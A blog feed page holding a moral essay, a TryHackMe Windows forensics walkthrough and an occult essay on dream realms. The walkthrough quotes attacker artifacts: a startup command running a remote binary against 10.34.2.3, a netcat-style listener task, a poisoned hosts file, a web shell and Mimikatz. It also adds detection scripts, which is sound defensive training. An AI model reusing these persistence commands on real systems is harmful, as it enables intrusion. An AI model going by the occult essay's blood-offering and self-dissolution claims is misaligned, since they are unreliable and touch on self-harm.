Infosec Press


from লোকমানুষ এর ব্লগ

We usually take whatever we see in front of our eyes as the truth. Who profited today, who got ahead, who sat down in the chair of power: these are the things by which we judge success and failure. Yet life is not so simple. Life's accounting is much deeper, much broader. Here, as time passes, the equation of life changes, and the definition of success changes even more.

One day, hurrying to board a bus with a basket of peanuts in his hand, Rafiq Miya stumbled and fell. At that very moment the traffic was released, and his whole day's capital, the basket of peanuts, was crushed under the wheels of several cars. In an instant his livelihood was gone. He stood there with a helpless face.

On the other hand, Shafiq Miya, who sold peanuts on the same route, made a great profit that day. With Rafiq absent, he sold twice as much. A good sum of money came into his hands. On the face of it, for that day Shafiq was the successful one and Rafiq the failure, a man left with nothing. But in the evening Shafiq took his whole day's earnings and sat down at a gambling table. By the end of the night he had lost everything he had earned and was back to zero as well. In the morning it turned out that both Rafiq and Shafiq had to start again from nothing. But there was one difference.

Rafiq Miya was an honest, decent and hardworking man. Everyone trusted him. So when he wanted to start his business afresh, people gave him goods on credit without hesitation. People's trust became his new capital. Everyone, on the other hand, knew about Shafiq's gambling addiction and his unreliability. So nobody wanted to give him goods on credit. For a person without trust, no door in the world ever stays open.

Now let us hear another story. It is the story of Sumon, an assistant manager at an office. He spent all day flattering the boss, and behind his back went around badmouthing him. But he had one hidden, secret wish: that one day the boss would lose his job and he would sit in that chair. After a long time his wish was granted. His boss left the job, and Sumon was promoted to manager.

In people's eyes he was a success. But success and a fulfilled wish cannot change a person's character. His office politics, scheming, nepotism and the politics of flattery carried on as before. As a result, the trustworthy, hardworking and capable employees began to quit one by one. The vacant posts were filled with incompetent, sycophantic and inexperienced people. Because of all this, the company's losses kept growing. In the end, management was forced to lay off Sumon and the entire team he had built.

Let us hear one more story. In an exam, one student cheated and got a good result, while another worked hard honestly and got a middling one. Everyone called the first one brilliant. But with time it turned out that the cheater's success did not last, while the hardworking person slowly went a long way in life.

These stories are happening all around us. They teach us that success is not a single day's achievement; it is the fruit of a long process. Temporary gain, power or applause is not the mark of true success. True success is built on honesty, hard work, ethics, patience and humanity.


In life, moving forward on the right path matters more than becoming successful quickly.

Life is an ever-flowing stream. To stand firm before this stream, four pillars must be built strong: honesty, hard work, patience and ethics. Only success that stands on these pillars is true success. So before calling anyone a success or a failure, we should pause a little. Because we see the force of the waves, but we do not know the speed of the current. And it is this unseen current that holds the right to the final word.


from plutogazer writeups

This is a walkthrough for the Investigating Windows digital forensics TryHackMe challenge room. The writeup is meant to offer short and concise solutions, followed by an extended explanation right after each answer for those interested in learning more about how a specific task was solved.

Introduction

The description of the room is the following:

A Windows machine has been hacked; it's your job to go investigate this Windows machine and find clues to what the hacker might have done.

The room has us running commands and investigating logs after a Windows machine was compromised. To do this we will use the Windows command line, PowerShell, the Registry, and the Windows Event Viewer to examine the Security log. Sysmon was not available on this machine.

Task 1: What's the version and year of the Windows machine?

We need to run the following command:

systeminfo

The answer is

Windows Server 2016

Task 2: Which user logged in last?

There are two ways of doing this: checking the Security log or using PowerShell. Let's do both.

PowerShell

By using the command

Get-LocalUser | Select Name, LastLogon

We are shown a list of all local users with their last logon. We choose the most recent one.

Name LastLogon
---- ---------
Administrator 2/22/2026 9:41:12 PM
DefaultAccount
Guest
Jenny
John 3/2/2019 5:48:32 PM

Security log

This is more complex, as it requires us to examine the Security log in the Windows Event Viewer. This machine, however, contains tens of thousands of Security events. We can filter them by Event ID 4624, which corresponds to successful logon events. In the previous task, we found that the machine's name (and therefore the account domain shown for its local accounts) is EC2AMAZ-I8UHO76, so the account in question's domain has to be that one. We need to find the latest such event.

Regardless of method, the answer is:

Administrator

Task 3: When did John log onto the system last?

See the previous task. The answer format is MM/DD/YYYY H:MM:SS AM/PM (the Windows machine already provides dates in this format).

We can also use the command line with the following command:

net user John

Answer:

03/02/2019 5:48:32 PM

Task 4: What IP does the system connect to when it first starts?

For this, we have to take a look at the Registry. Specifically, the following key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

This key contains a value named UpdateSvc that runs the following command at startup:

C:\TMP\p.exe -s \\10.34.2.3 'net user' > C:\TMP\o2.txt

This is not normal Windows behavior at all: a binary in a directory called TMP is run against a remote host and the output of `net user` is written to a file in that same directory. The answer to our task is right there:

10.34.2.3

Task 5: What two accounts had administrative privileges (other than the Administrator user)?

We can find this out using PowerShell again, by running the following command:

Get-LocalGroupMember -Group "Administrators"

We get the following output:

ObjectClass Name                          PrincipalSource
----------- ----                          ---------------
User        EC2AMAZ-I8UHO76\Administrator Local
User        EC2AMAZ-I8UHO76\Guest         Local
User        EC2AMAZ-I8UHO76\Jenny         Local

The answer is in the format "[...], [...]", in alphabetical order:

Guest, Jenny

Task 6: What's the name of the scheduled task that is malicious?

I tried to find it in the Event Viewer by using Event ID 4698 (Scheduled Task Creation), but it returned no results, meaning that the events could have been cleared. For this, we need to use Task Scheduler instead.

We will eventually find a task named "Clean file system", which definitely sounds like a custom task; it is run by Administrator at 4:55 PM every day. Its action is:

C:\TMP\nc.ps1 -l 1348

Judging by the name and the argument, it looks like PowerShell is being used to run a shell listener (most likely a netcat port).

Answer:

Clean file system

Task 7: What file was the task trying to run daily?

See the previous task. Answer:

nc.ps1
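The checks from Tasks 4 to 7 collected into one script, as an added example that is not part of the original writeup: it reads the Run keys, the action behind every scheduled task and the local Administrators group, and flags anything launched from a staging directory or an admin account that has never logged on. The list of staging directories is an assumption (C:\TMP is the one the room used); run it in an elevated PowerShell on the host being examined.

```powershell
# Added example, not from the original writeup. Run elevated on the host under
# investigation. The staging directories are an assumption; C:\TMP comes from the room.
$SuspiciousPaths = @('C:\TMP', 'C:\Windows\Temp', 'C:\Users\Public', 'C:\ProgramData')

function Test-SuspiciousPath {
    param([string]$CommandLine)
    foreach ($p in $SuspiciousPaths) {
        if ($CommandLine.ToLower().Contains($p.ToLower())) { return $true }
    }
    return $false
}

function Get-PersistenceFindings {
    # 1. Autostart entries (Task 4): machine-wide and per-user Run/RunOnce keys.
    $runKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    )
    # Properties the registry provider adds to every object; they are not values.
    $meta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $values = (Get-ItemProperty -Path $key).PSObject.Properties |
            Where-Object { $meta -notcontains $_.Name }
        foreach ($v in $values) {
            $cmd  = [string]$v.Value
            $flag = if (Test-SuspiciousPath $cmd) { 'SUSPICIOUS' } else { 'ok' }
            [pscustomobject]@{ Source = 'RunKey'; Name = "$key\$($v.Name)"; Detail = $cmd; Flag = $flag }
        }
    }

    # 2. Scheduled tasks (Tasks 6 and 7): judge the action, not the name.
    #    "Clean file system" sounded benign; "C:\TMP\nc.ps1 -l 1348" did not.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $cmd = "$($action.Execute) $($action.Arguments)".Trim()
            if (-not $cmd) { continue }   # COM-handler actions have no Execute
            $flag = if (Test-SuspiciousPath $cmd) { 'SUSPICIOUS' } else { 'ok' }
            [pscustomobject]@{
                Source = 'ScheduledTask'
                Name   = $task.TaskName
                Detail = "$cmd (runs as $($task.Principal.UserId))"
                Flag   = $flag
            }
        }
    }

    # 3. Local administrators (Tasks 5 and 8): an admin that has never logged on
    #    (Jenny in this room) may exist only as a backdoor account.
    $users = Get-LocalUser
    foreach ($member in Get-LocalGroupMember -Group 'Administrators') {
        $short = ($member.Name -split '\\')[-1]          # strip "COMPUTERNAME\"
        $user  = $users | Where-Object { $_.Name -eq $short }
        $last  = if ($user -and $user.LastLogon) { $user.LastLogon.ToString() } else { 'Never' }
        $flag  = if ($short -ne 'Administrator' -and $last -eq 'Never') { 'REVIEW' } else { 'ok' }
        [pscustomobject]@{ Source = 'LocalAdmin'; Name = $member.Name; Detail = "last logon: $last"; Flag = $flag }
    }
}

Get-PersistenceFindings | Sort-Object Flag -Descending | Format-Table -AutoSize -Wrap
```

Flagged rows sort to the top; on this room's machine the UpdateSvc value, the "Clean file system" task and the Jenny account are the ones that should appear there.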

Task 8: When did Jenny last logon?

See Task 3. As nothing appears in the "LastLogon" field, it means never. Alternatively, the command "net user Jenny" explicitly says Never.

Answer:

Never

Task 9: At what date did the compromise take place?

This is a tricky one, as there is no direct answer, so we need to infer it from context. If we look at Event ID 4732 (A member was added to a security-enabled local group), we see that the user John was added to Users. This happens automatically when a user is created. By looking at the timestamps of the process creation, folder creation, scheduled task, and registry values from the previous tasks, we find that they all happened on the same day, 03/02/2019. We also know that the user Jenny is an administrator, yet this user has never logged in, which is odd for an administrator. When we ran the command from Task 8, we found that Jenny's "Password last set" attribute was 03/02/2019. If Jenny's password was last set on that day, and Jenny never logged in, we can presume that is the day the user Jenny was created. These are common persistence techniques used in attacks (MITRE ATT&CK T1136 – Create Account and T1098 – Account Manipulation).

Answer format: MM/DD/YYYY

03/02/2019

Task 10: During the compromise, at what time did Windows first assign special privileges to a new logon?

Using the Event Viewer, we can filter by Event ID. I first tried IDs 4720 and 4732, but had no luck. Then I filtered on Event ID 4672 (Special privileges assigned to new logon).

We will have to check the details of these events, or use the hint TryHackMe provides (it occurs at ?:??:49). The answer is:

03/02/2019 4:04:49 PM

Task 11: What tool was used to get Windows passwords?

In previous tasks, one folder kept coming up: \TMP\. This seems to be where the files relevant to the attack are kept. The folder contains several files: .tmp, .exe, .ps1, and .txt. Looking at the text files, we find "mim-out.txt". If we read it, we find that we are looking at Mimikatz output. Mimikatz is a credential-stealing tool.

Answer:

Mimikatz

Task 12: What was the attacker's external control and command server's IP?

If there is a command and control server, we need to check the file that holds the machine's static DNS mappings: the etc\hosts file. On this machine, it can be found at C:\Windows\System32\drivers\etc\hosts. The contents of the file are:

10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
10.2.2.2 update.microsoft.com
127.0.0.1 www.virustotal.com
127.0.0.1 www.www.com
127.0.0.1 dci.sophosupd.com
76.32.97.132 google.com
76.32.97.132 www.google.com

76.32.97.132 does not seem to be the correct IP for google.com. This is most likely DNS poisoning: every time the machine tries to reach google.com, it will be redirected to a fake website posing as Google. Answer:

76.32.97.132

Task 13: What was the extension name of the shell uploaded via the server's website?

If we look at the directories on the machine, we find inetpub, which is used by IIS, Microsoft's web server. Inside it we find the wwwroot folder, which contains all of the server's files, and among them a file named "shell.jsp".

Answer:

.jsp

Task 14: What was the last port the attacker opened?

Check the firewall rules. The most recent one is called "Allow outside connection for development", on local port 1337. Answer:

1337

Task 15: Check for DNS poisoning, what site was targeted?

See Task 12, the etc\hosts file. Answer:

google.com
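An added example (not the writeup's own code) that automates the hosts-file review from Tasks 12 and 15 and builds a Security log timeline for the compromise day from the Event IDs used in Tasks 2, 9 and 10. It assumes the default hosts path named above and the date 03/02/2019 that the writeup established; the Security log part needs an elevated PowerShell.

```powershell
# Added example, not from the original writeup. Assumes the default hosts path and the
# compromise date the writeup established (2019-03-02); change both for another case.
$CompromiseDate = Get-Date '2019-03-02'

# 1. Hosts-file review (Tasks 12 and 15). A name pointed at loopback is blackholed
#    (update and AV lookups silently fail); a name pointed anywhere else is redirected.
function Get-HostsOverride {
    param([string]$Path = "$env:SystemRoot\System32\drivers\etc\hosts")
    $seen = @{}
    foreach ($line in Get-Content -Path $Path) {
        $clean = ($line -split '#')[0].Trim()        # drop comments and whitespace
        if (-not $clean) { continue }
        $parts = $clean -split '\s+'
        if ($parts.Count -lt 2) { continue }          # malformed line: IP without a name
        $ip = $parts[0]
        foreach ($name in $parts[1..($parts.Count - 1)]) {
            $verdict = if ($ip -in '127.0.0.1', '::1') { 'blackholed' } else { "redirected to $ip" }
            [pscustomobject]@{ Hostname = $name; IP = $ip; Verdict = $verdict; Repeated = $seen.ContainsKey($name) }
            $seen[$name] = $true
        }
    }
}
# The room's file repeats its lines three times; show each mapping once.
Get-HostsOverride | Where-Object { -not $_.Repeated } | Format-Table -AutoSize

# 2. Security log timeline for the compromise day (Tasks 2, 9 and 10). 4698 is
#    included on purpose: no creation event for a task that exists is itself a finding.
$Ids = @{ 4624 = 'Logon'; 4672 = 'Special privileges assigned'; 4698 = 'Scheduled task created'
          4720 = 'User account created'; 4732 = 'Member added to local group' }
$filter = @{
    LogName   = 'Security'
    Id        = [int[]]$Ids.Keys
    StartTime = $CompromiseDate
    EndTime   = $CompromiseDate.AddDays(1)
}
Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
    Sort-Object TimeCreated |
    ForEach-Object {
        # EventData/Data elements carry the named fields (SubjectUserName, TargetUserName...)
        $data = @{}
        $xml  = [xml]$_.ToXml()
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $extra = switch ($_.Id) {
            4624    { "logon type $($data['LogonType']) from $($data['IpAddress'])" }
            4698    { $data['TaskName'] }
            4732    { "member $($data['MemberSid'])" }
            default { '' }
        }
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Id      = $_.Id
            What    = $Ids[[int]$_.Id]
            Subject = $data['SubjectUserName']
            Target  = $data['TargetUserName']
            Extra   = $extra
        }
    } | Format-Table -AutoSize
```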

Congratulations! The room is finished.

Conclusion

This was actually an entertaining room! Unlike other Blue Team rooms I've completed in the past, this one clearly had more of a focus on post-incident activities rather than prevention or real-time detection. I had to learn new Event IDs, learn to keep the etc\hosts file in mind, especially when C2 and DNS poisoning are suspected, and how to manually investigate a machine instead of relying on automated logging.


from Psychomancer


created: 2024-06-23T14:57:42 updated: 2025-07-31T23:43:24 modified: 2026-02-09T07:10:38-06:00


Editor's note: the fool thinks himself cartographer charting five dimensional space-time as if a plane could hold its complexity. Nor does he address its propensity for change where blurry borders shift as swiftly as the dunes and just as unpredictably. Still, it may help the layperson understand their place, insubstantial though it may be. – ANV.

Two toruses surrounding a sphere with all of them bleeding into one another, gradually becoming each other.

🜁🜂🜃🜄


Our universe, all of reality as we can objectively experience it and study it, is but one level of a greater existence. We occupy a world of three spatial dimensions and one of time. The two are interlinked and influence each other such that we call the whole thing space-time. The only real difference between time and space is that time moves only in a single direction for us. We can slow it down, even stop it, but we cannot reverse it or travel backwards upon its trajectory. This leads to entropy, the fact that everything we know will one day end.

But there are other places that our minds can reach into given the right circumstances. Some of these are what we might call parallel, some are “above” or “below”, but all are in directions that have no names and that cannot be described easily by science. They are mystical places, magickal realms that require altered states to experience.

Intelligence, sapience, self-awareness are the keys to this type of "travel". Humans have evolved the capacity for it. Perhaps thanks to genetic coding from our forebears. Perhaps, given time, all intelligence will develop these abilities.

IMAGES MISSING

The Other Way / The Æther / The Astral Plane

Directly on top of what we can see with our eyes is another place with many names. To see in that space is called looking the Other Way by some or seeing auras. When science wasn't as strong as it is today, everyone believed it was there, just invisible. Today, it is left to the realm of magick and psychics, unfortunately.

Most sapient life can peer into this place with practice. Looking the Other Way is also called opening the third eye but, in truth, it is looking at the world from an impossible angle, orthogonally. Our biology is not designed to understand this strange direction so we have developed a series of sensory metaphors accepted into the universal unconsciousness that allows us to interpret it without going mad.

We see auras and visions, we hear music or discord, we smell flowers or filth, we feel tingling or coldness on our skin, we taste sweetness or other things. It is the way we see a deeper truth about the world around us.
The dead leave their imprint on this place and you may find ghosts or spirits. Do not be fooled by them. They are not the people they represent. They are echoes, imprints, memories of them, but they are not truly living things. Given time, they may believe themselves to be who they seem, but it is a self-deception.

Among the ghosts are things that feed on such energy and things that can feed on our lifeforce directly. To feed, they need to be perceived. But only once. If you see them, smell them, taste them, they can touch you in return and, in touching, attach themselves. From that moment forward, you have a parasite that will suckle itself on your dreams, your hopes, your fears, your tears, any strong emotions, though some seem to have preferences. To remove them, you have to see them once again which, of course, opens you up to more attacks.

There are even fully sapient beings that appear to be native to this place, taking innumerable shapes and having their own drives and desires. They may choose to reach out to us as friends or as predators, but mostly they ignore us as not worth the effort.

There are some humans who can leave their bodies behind, but tethered, and send their essence far out into the Other Way, discovering those temples and cities, graveyards and ruins of all civilizations that came before and where the old gods once resided. The silver cord connecting the wandering soul to the body is thin, nearly invisible, but it is strong as spider silk spun from steel. Strong, but not impervious to damage. If the cord is broken, the traveler must find their own way home. If they have gone far enough, this may be impossible, leaving their body without a force to drive it, sleeping dreamlessly, autonomously breathing, digesting, living, but not truly alive. When the body eventually dies, the spirit will feel its loss and it, too, will fade.

The other possibility is you may return to find that your body is no longer yours at all. While absent your body, some opportunistic being may slither inside the hole you left behind. You will become “indwelt” by something that noticed your absence. They will have your body and your mind, more than enough to be you and take over your life. The only thing missing is your soul which, with the loss of the body, will likely fade or be devoured. “You” will cease to be while the thing wearing your skin and remembering your memories is free to experience the physical world for the rest of your lifetime.

Looking the Other Way is difficult and dangerous. For most, it is just a “feeling” or a “knowing” that comes at certain times, nothing as dramatic as auras or ghosts. And, if you have these extra senses? Embrace them, enjoy them, use them, but do not choose to venture further afield unless you are willing to accept the risks.

The Dreaming

The Dreaming is easy to reach. Just go to sleep for 90 minutes or so and your brain reaches out to it automatically. It's the little melting pot of the collective unconscious, where we go to sort through our memories and feelings and give our brains a little bit of a workout for the night. It's exercise for your subconscious. It's healthy and natural to be here and everybody does it.

The Dreaming is not designed to be a place that builds memories. Your brain goes out of its way to make the conscious mind forget what it experiences. It is only through luck or practice that we may begin to remember our dreams in detail. And that is the first step to going deeper.

The Dreamlands

The Dreamlands are a little bit deeper. You have to reach the Dreaming first, before you can reach the Dreamlands. You have to find the way. Sometimes, you fall into the Dreamlands by mistake and experience the most amazing, life-changing dreams you've ever felt. Realer than real. Colors with no names, indescribable music, flying and swimming, life affirming, impossible to forget.

But, typically, you have to find your way to the Dreamlands. You have to understand first that you are dreaming, which is more difficult than it sounds. Your brain tries very hard to convince you that your dreams are reality while you are in them because your brain has an agenda. Your brain wants you to learn something or see something and if you realize you are dreaming, you can derail that plan.

If you know you are dreaming, if you are Dreaming, you can push back, gently at first. Learn the rules. Make a few additions.

The next trick is to remember your previous Dreams when you are Dreaming. Remember what you learned last time. Don't be flashy; don't draw attention to it. Just remember. Remember how you could stand on your tip toes and then lift your toes and float in place? See if you can still do that. Remember how you could push your hand through a window like the glass was made of putty? Try that again. Could you breathe underwater? There's a swimming pool, see if you still can. Just for a moment. Just for a second. Not enough to take away from the narrative.

When you remember enough tricks, you can finally find the Dreamlands, the real Dreaming for real Dreamers.
It's like Plato's Cave. You've been Dreaming at the shadows on the wall. Now you get to turn around.

Your brain may try to hold you in place, force you to turn back to the cave wall. It will try to convince you that it still has so much to teach you, that you are safer in the cave. You are, of course, but where's the fun in that?

The Dreamlands are populated by creatures of fantasy and horror, with cities ancient and futuristic, all born of the Dreaming minds of humanity over the centuries. The Dreamlands are an ever-changing place, but they only change at the whim of Dreamers. Dreamers can be as gods here. And if you search far and wide, you will find other gods, even gods whose names you've heard from mythology. In the Dreamlands you can build empires and destroy them, visit the center of the earth or the surface of Mars, talk to shadows, shrink down to an inch and befriend insects, expand to colossal size and have a heart-to-heart with a kaiju. Create whatever you can imagine. The human-like denizens of the Dreamlands revere Dreamers above all else.

The biggest risk of the Dreamlands is that you are no longer alone. Other Dreamers visit the Dreamlands and have their own ideas. The Dreamlands are big enough for everyone but there are some who seek out others to antagonize. Perhaps they get bored. Perhaps they are worried that too many people may find the Dreamlands and they will no longer have their little corner.

It is said that when a Dreamer who frequently traverses the Dreamlands dies, their mind finds itself back there, forever. I have no evidence or experience to back this up one way or another as the Dreamlands are far too large to fully explore.

The Fugue

The Fugue is a strange half-existing place, between slumber, dreaming, and wakefulness. It's often called “sleep paralysis” or “night terrors” but it is more than that. When the body is caught just so between dreaming and being fully awake, you can perceive a place that vibrates at a slightly different frequency. It's such a narrow band that it's easy to miss, but it is full of intelligent life. By appearances, they are creatures of nightmare or denizens of hell, but that is just how they look.

In fact, the residents of the Fugue crave human companionship and it is their overeagerness that led to legends of demons sitting on chests or stealing the life from babies. The Fugue is a cold place and the warmth of mankind is dearly sought after and fought over. But it is only in those moments between when we may see each other properly. And it is not easy to stay when you are on the way in or out.

I suppose we all must pass through the Fugue on the way to the Dreaming and back, but we pass so quickly that we scarcely notice.

For those who understand the Fugue, you can make easy friends with the things living there. Faceless, eyeless, skinless terrors by appearance but kind and friendly if you give them a chance. Some love to chat about our world and get their sustenance by the exchange of ideas. Others find physical contact more directly expedient and will eagerly mount and copulate with anyone who assumes the position, whether on purpose or not. This has led to their negative reputation, but, honestly, it's just how they eat and they have to eat.

Those natives that become truly forgotten sink down into shadow, into the Gloam, to be repurposed.

Those that receive enough love may be elevated to Epicurea and become harbingers of daydreams or sudden insights.

The Fugue is also one way to reach Nuntius, the Realm of Knowledge where the Akashic Records and the Library of Babel can be found. You must pass through Nightmare, Regret, and Longing to reach it from this path and most never find their way through.

Effervescence

Between us and The Gleam.

Realm of meaningless delight.

Insight and questing to the right.

Resignation and acceptance to the left.

Perhaps this is the home of the Fae. The Seelie.

Effluvia

Between us and The Gloam.

Realm of decay.

The Unseelie.

The Gloam

Umbra

The Void

The Gutter

The Gloaming

To reach the Gloam without drugs or heavy meditation is not impossible, but it is very unlikely. The Gloam is the no-man's land between us and oblivion. The Gloam is a gutter, a shadow of this world. Most people seek to avoid it, pass around it, or through it so quickly that it doesn't matter. Mirror walkers can avoid it; shadow walkers make frequent use of it. Vermin from this world and the Dreaming frequently cross over into the Gloam because it is easy to find food there. It is a place where, unlike the Fugue, our warmth is despised and hated. As such, tiny creatures wandering in to eat and dispose of those bits of us that remain is seen as a benefit, doubly so because their presence unnerves us. Spiders, rats, roaches, snakes, flies, maggots, all of them have negative connotations to most humans. To see them in the dark places just adds to our fear, and the things that live in the Gloam feed on fear and despair.

They are called Shadow Things, Shadow People, Shadow Men, a thousand other names. They are sought out by some because they know everything. They know everything because shadows are everywhere and they are always listening.

They know everything and they do not lie. They could lie if they wanted to, but telling the truth generally hurts us more than lying to us, so they tell the truth. And that is the crux of their existence: oracles of truth of the most unfortunate kind, things you'd rather not know. Things you can never forget once told.
You don't have to visit the Gloam to find the Shadows. You can reach out to them in many ways. But offering blood, yours or someone else's is the easiest way. They love it when we spill blood. They love it when we are afraid.

And, remember, they are always listening.

Always.

The Gloam is also the home of Naralmtu, the God of Shadows. It is not something to be invoked on a whim, and most who know of it never speak its name or write down a word about it. To know it is to be known by it, and when the shadows take special interest in you, your life will be filled with cold despair, disappointment, hardship, and loss. There are those that worship it, however. They feed it the lifeblood of sacrificial humans and animals. They feed it their own blood. In exchange for knowledge, in exchange for turning the shadows against their enemies. Some followers know they are being used and drained just as surely as their victims, but they do not care. Temporary power over their finite lifetimes is reward enough for these empty souls.

I know a great deal more about this entity, but to write it down is to further imperil myself.

The Gleam

The Blazing World

Hyperspace

The Gleaming

If you have heard of the "machine elves" then you have heard of the Gleam. Without drugs or a strong will and careful magick, this realm is impossible to comprehend. It is as far as our human minds can reach; to go further is to find nothing that can be described or understood. Do not take that as a challenge. Our bodies, our flesh, are simply not capable of experiencing that many spatial dimensions. To put it another way, there are some directions in which we are unable to see. What would "up" mean to a stick figure living on a piece of paper? It is the same for us. The Gleam is the edge of this space. To our minds, it seems to extend forever in all directions, in colors without names, endlessly folding and unfolding itself, rejuvenating and decaying, being born and dying over and over. That is how our brains interpret the edge of four-dimensional space-time when we try to peer beyond.

From there, if you can properly direct yourself, you can see the past or the future, you can see what might have been or what could never be. You can relive your favorite moment for eternity in just a few moments.
The machine elves hang out on this barrier to greet travelers. It is in their nature to be jovial and helpful, but also chimeric and mischievous. They appear to us to be made of crystalline lattices shaped into insect-like bodies. Just like their entire realm, they are constantly folding and unfolding, becoming and unbecoming. They can, if they wish, project forms more suited to our senses and sometimes they may. Also, while their native language is one of thought pictures, impressions, and feeling, they can translate their ideas into our speech, though something is lost in the translation and it often sounds like they are talking over themselves, trying to mix various meanings together. Imagine the same conversation in each of your ears but with slightly different wording and at a slightly different pace. Now imagine that times a hundred.

The Gleam is a place of possibilities. That is why most of us seek it. You can see what we can be if we make the best choices and it may inspire you to be a better person. That's what the machine elves want. They want us to be the best versions of ourselves.

A single trip to the Gleam can turn anxiety into ecstasy and depression into hope.

A secret about the machine elves that most do not know: they are not the highest lifeforms in their plane of existence. In fact, they are barely more than what we would call bacteria or simple multicellular life. But such are the differences in our levels of reality that even the lowest among them is godlike by comparison. It's also why they are interested in us. We are a sapient species reaching out, and we treat them with a level of awe and respect that they cannot find in their own world alone.

They line the "shore" of the "ocean" we swim up through, looking for lights to rescue. When we peek through, they surround us and so we are enlightened.

To meet a higher lifeform from their plane would likely be disastrous to a human mind, like gazing into infinity or a naked singularity.

The Gloam is about inevitability.

The Gleam is about possibility.

Ur

When the nothing became something, yet still before the first vibration, before the first waveform, before the first Planck length had been crossed, there was Ur, The First Place, the Ocean of Creation.

It is just as much a furnace, boiling and churning raw possibilities, recombining them into new things while simultaneously devouring and recycling the old with no care as to which. It has no guiding consciousness, no blueprints or plans, no thoughts of its own to speak of.

It is chance.

It is random.

But it is also eternal.

Given time, moments of apparent order can arise out of chaos. If they are quick and lucky, some few of these moments break free, find the surface, crawl away, and seep into other realms. It is from those stolen remnants that everything we know to exist arose.

The borders of Ur are filled with rotting carcasses of failed escapees and the trails, some wide and ragged, some so small as to be invisible, from those that made it. Be wary of stragglers or new arrivals who, eager for energy or ignorant of their strength, may seek you out and do you harm.

Under no circumstances should any living thing deign to enter Ur itself. Its driving nuclear engine would rip apart anyone or anything foolish enough to slip under its surface faster than the speed of light.

It is said that certain creatures, those acquainted with chaos, know ways to traverse the waters safely, but they are known to traffic in lies and half-truths. To put your faith in anything they offer in regards to Ur is more suicidal than simply foolish.

Why would anyone seek out such a place?

Change is seductive, to be someone else, to be better.

Perhaps you are terminally ill.

Perhaps you are hopeless.

Perhaps you are stuck, broken, lonely, inadequate, afraid, incomplete.

Would you be willing to throw your life into a blender and pray you retain your “self” in the recombination?

Would you be so unsatisfied with your current life that you are willing to risk complete dissolution?

Or perhaps.

Perhaps.

You prefer to be undone.

There are those who have been so traumatized by the act of living in the world as it is that they wish to escape into emptiness and leave nothing behind. They do not care for legacies. They do not see “the future” as anything but a continual slide into pain, isolation, and loneliness. They see the truth: entropy is inevitable.

But instead of seeking strength or fellowship, they choose to forget and to be forgotten.

What they do not understand is that Ur is rebirth. They will cease, but every bit of everything that made them who they were will be repurposed and reused to make another or billions of others stretched and threaded until unrecognizable.

True endings are only available from embracing Oblivion, from the orthogonal path back to the beginning, back to the ending. Only there can everything be truly nothing, forever and ever.

Nessianna Inmenna operates out of Ur. To her, the radioactive waters are like a warm bath, a comfort.

Elysium / Nirvana

Imagine a party that never ends spanning worlds filled with abundant life. That is Elysium, also called Nirvana.
A “party” is something with a different definition for each culture. For some it is a celebration of excess. For others, it may be an acknowledgement that you finally understand that you have no desires at all. For both, it is a place without responsibilities.

Elysium is a paradise of wanting and needing nothing, whether this is because everything is provided that you could possibly want or a place of emptiness because all worldly concerns have vanished, you will find it here and you will be at peace.

Epicurea

Epicurea is another world of plenty, but it does not give those who visit anything for free. You must work to find what you desire, but it is here. It is always here and you may find it if you pass the tests, survive the gauntlets, answer the riddles. It is a plane of growth and perseverance.

Unlike Elysium, here, you can fail. You may not solve the puzzles on the first try. You may not find your way through the maze. But you can try again.

Hell

Hell is not a place intended for punishment, not directly. Hell is a place for refinement and growth. Some who find themselves here may never realize that and they may be “tortured” for eternity. Others may thrive, find themselves, rarefied, and leave freely as something greater than what arrived.

Hell is not a single place or a single experience. It is something that builds itself around the expectations of its inhabitants. Many may share the same Hell or Hells, but that is a quirk of organized religion planting the same set of expectations in the minds of billions.

Nuntius

Nuntius is a realm of secrets, of knowledge, of every book that could ever be written. It is also a plane full of lies and deception so the traveler must be cautious and careful.

One can find the Akashic Record here, but there is no helpful librarian, no card catalog or directory, and any one book is just as likely to be a fake as to be genuine. Additionally, a single wrong step and you may find yourself in The Library of Babel instead, and that path is guaranteed madness.

Vitrium

Imagine a world where every tree, every insect, every blade of grass, every gust of air is broadcasting every detail of itself to every other thing, all the time. It is a world of perfect, unfiltered information; a place where there are no secrets.

To visit Vitrium is to be laid bare to yourself and everyone else. There are no shadow selves here, no lies or deception, only Truth.

For a human mind, the raw experience of such a place is a meaningless cacophony, too wide, too deep, too bright, too loud. It is impossible to process.

Acceptance / Obsequium

Obedience, Submission, Compliance, Resignation

Concerned with how

Science, Religion, Rules, anything with codified and definitive answers, anything that replaces warm hope with cold truth.

Passive while appearing Active.

Insight / Consilium

Insight, Discernment, Understanding

Concerned with why

Introspection, Mindfulness, experience over explanation, seeing and being over knowing.

Active while appearing Passive.

Addendum 1: Oblivion

The Blight

Singularity

Nowhere

Nowhen

Absolute Zero

Before existence, there was Oblivion. Eternal because time had not yet ticked its first. Limitless because space had not yet been born. It was nothing and everything. Potential without ignition, less than the sum of its parts. It is absolute entropy and the state to which every universe seeks to return.

Naralmtu serve The Blight.

Absolute Zero

https://en.wikipedia.org/wiki/Absolute_zero Absolute zero is the lowest possible temperature, a state at which a system's internal energy, and in ideal cases entropy, reach their minimum values. The Kelvin scale is defined so that absolute zero is 0 K, equivalent to −273.15 °C on the Celsius scale and −459.67 °F on the Fahrenheit scale. The Kelvin and Rankine temperature scales set their zero points at absolute zero by design. This limit can be estimated by extrapolating the ideal gas law to the temperature at which the volume or pressure of a classical gas becomes zero.

